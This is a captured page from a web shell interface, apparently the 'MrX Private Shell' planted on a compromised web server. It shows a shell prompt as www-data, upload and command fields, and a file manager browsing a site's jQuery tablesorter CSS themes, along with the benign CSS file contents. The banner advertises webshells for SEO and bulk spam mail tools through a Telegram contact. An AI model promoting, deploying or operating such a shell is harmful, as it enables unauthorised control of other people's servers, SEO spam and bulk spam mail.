__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
/*************
  jQuery UI Theme
 *************/
 /* overall */
.tablesorter-jui {
	width: 100%;
	border-collapse: separate;
	border-spacing: 2px; /* adjust spacing between table cells */
	margin: 10px 0 15px;
	padding: 5px;
	font-size: 0.8em;
}

/* header */
.tablesorter-jui thead th,
.tablesorter-jui thead td,
.tablesorter-jui tfoot th,
.tablesorter-jui tfoot td {
	position: relative;
	background-repeat: no-repeat;
	background-position: right center;
	/* UI hover and active states make the font normal and the table resizes, this fixes it */
	font-weight: bold !important;
	border-width: 1px !important;
	text-align: left;
	padding: 8px; /* wider than the icon */
}
.tablesorter-jui .header,
.tablesorter-jui .tablesorter-header {
	cursor: pointer;
	white-space: normal;
}
.tablesorter-jui .tablesorter-header-inner {
	padding-right: 20px;
}
.tablesorter-jui thead tr th .ui-icon {
	position: absolute;
	right: 3px;
	top: 50%;
	margin-top: -8px; /* half the icon height; older IE doesn't like this */
}

.tablesorter-jui thead .sorter-false {
	cursor: default;
}
.tablesorter-jui thead tr .sorter-false .ui-icon {
	display: none;
}

/* tfoot */
.tablesorter-jui tfoot th,
.tablesorter-jui tfoot td {
	font-weight: normal !important;
	font-size: .9em;
	padding: 2px;
}

/* tbody */
.tablesorter-jui td {
	padding: 4px;
	vertical-align: top;
}

/* hovered row colors */
.tablesorter-jui tbody > tr.hover > td,
.tablesorter-jui tbody > tr:hover > td {
	opacity: 0.7;
	filter: alpha(opacity=70);
}

/* table processing indicator */
.tablesorter-jui .tablesorter-processing .tablesorter-header-inner {
	background-position: center center !important;
	background-repeat: no-repeat !important;
	/* background-image: url(images/loading.gif) !important; */
	background-image: url('data:image/gif;base64,R0lGODlhFAAUAKEAAO7u7lpaWgAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQBCgACACwAAAAAFAAUAAACQZRvoIDtu1wLQUAlqKTVxqwhXIiBnDg6Y4eyx4lKW5XK7wrLeK3vbq8J2W4T4e1nMhpWrZCTt3xKZ8kgsggdJmUFACH5BAEKAAIALAcAAAALAAcAAAIUVB6ii7jajgCAuUmtovxtXnmdUAAAIfkEAQoAAgAsDQACAAcACwAAAhRUIpmHy/3gUVQAQO9NetuugCFWAAAh+QQBCgACACwNAAcABwALAAACE5QVcZjKbVo6ck2AF95m5/6BSwEAIfkEAQoAAgAsBwANAAsABwAAAhOUH3kr6QaAcSrGWe1VQl+mMUIBACH5BAEKAAIALAIADQALAAcAAAIUlICmh7ncTAgqijkruDiv7n2YUAAAIfkEAQoAAgAsAAAHAAcACwAAAhQUIGmHyedehIoqFXLKfPOAaZdWAAAh+QQFCgACACwAAAIABwALAAACFJQFcJiXb15zLYRl7cla8OtlGGgUADs=') !important;
}

/* Zebra widget - This allows you to use ui-state-default as the zebra stripe color */
.tablesorter-jui tr.ui-state-default {
	background-image: none;
	font-weight: normal;
}

/* processing background color */
.tablesorter-jui .tablesorter-processing {
	background-color: #ddd; /* older browsers that don't support rgba */
	background-color: rgba(255,255,255,0.8);
}

/* caption */
.tablesorter-jui > caption {
	border: 0;
}

/* filter widget */
.tablesorter-jui .tablesorter-filter-row {
	background-color: transparent;
}
.tablesorter-jui .tablesorter-filter-row td {
	background-color: transparent;
	line-height: normal;
	text-align: center; /* center the input */
	-webkit-transition: line-height 0.1s ease;
	-moz-transition: line-height 0.1s ease;
	-o-transition: line-height 0.1s ease;
	transition: line-height 0.1s ease;
}
/* optional disabled input styling */
.tablesorter-jui .tablesorter-filter-row .disabled {
	opacity: 0.5;
	filter: alpha(opacity=50);
	cursor: not-allowed;
}
/* hidden filter row */
.tablesorter-jui .tablesorter-filter-row.hideme td {
	/*** *********************************************** ***/
	/*** change this padding to modify the thickness     ***/
	/*** of the closed filter row (height = padding x 2) ***/
	padding: 2px;
	/*** *********************************************** ***/
	margin: 0;
	line-height: 0;
	cursor: pointer;
}
.tablesorter-jui .tablesorter-filter-row.hideme * {
	height: 1px;
	min-height: 0;
	border: 0;
	padding: 0;
	margin: 0;
	/* don't use visibility: hidden because it disables tabbing */
	opacity: 0;
	filter: alpha(opacity=0);
}
/* filters */
.tablesorter-jui input.tablesorter-filter,
.tablesorter-jui select.tablesorter-filter {
	width: 98%;
	height: auto;
	margin: 0;
	padding: 4px;
	background-color: #fff;
	border: 1px solid #bbb;
	color: #333;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	-webkit-transition: height 0.1s ease;
	-moz-transition: height 0.1s ease;
	-o-transition: height 0.1s ease;
	transition: height 0.1s ease;
}
/* rows hidden by filtering (needed for child rows) */
.tablesorter .filtered {
	display: none;
}

/* ajax error row */
.tablesorter .tablesorter-errorRow td {
	text-align: center;
	cursor: pointer;
	background-color: #e6bf99;
}

Filemanager

Name Type Size Permission Actions
images Folder 0755
less Folder 0755
scss Folder 0755
dragtable.mod.css File 2.18 KB 0644
filter.formatter.css File 5.36 KB 0644
highlights.css File 3.11 KB 0644
jquery.tablesorter.pager.css File 978 B 0644
theme.blackice.css File 5.64 KB 0644
theme.blue.css File 7.11 KB 0644
theme.bootstrap.css File 6.48 KB 0644
theme.bootstrap_2.css File 6.27 KB 0644
theme.bootstrap_3.css File 6.36 KB 0644
theme.bootstrap_4.css File 7.81 KB 0644
theme.dark.css File 5.52 KB 0644
theme.default.css File 5.66 KB 0644
theme.dropbox.css File 7.78 KB 0644
theme.green.css File 8.57 KB 0644
theme.grey.css File 7.97 KB 0644
theme.ice.css File 6.79 KB 0644
theme.jui.css File 4.54 KB 0644
theme.materialize.css File 7.26 KB 0644
theme.metro-dark.css File 6.45 KB 0644
widget.grouping.css File 763 B 0644
Filemanager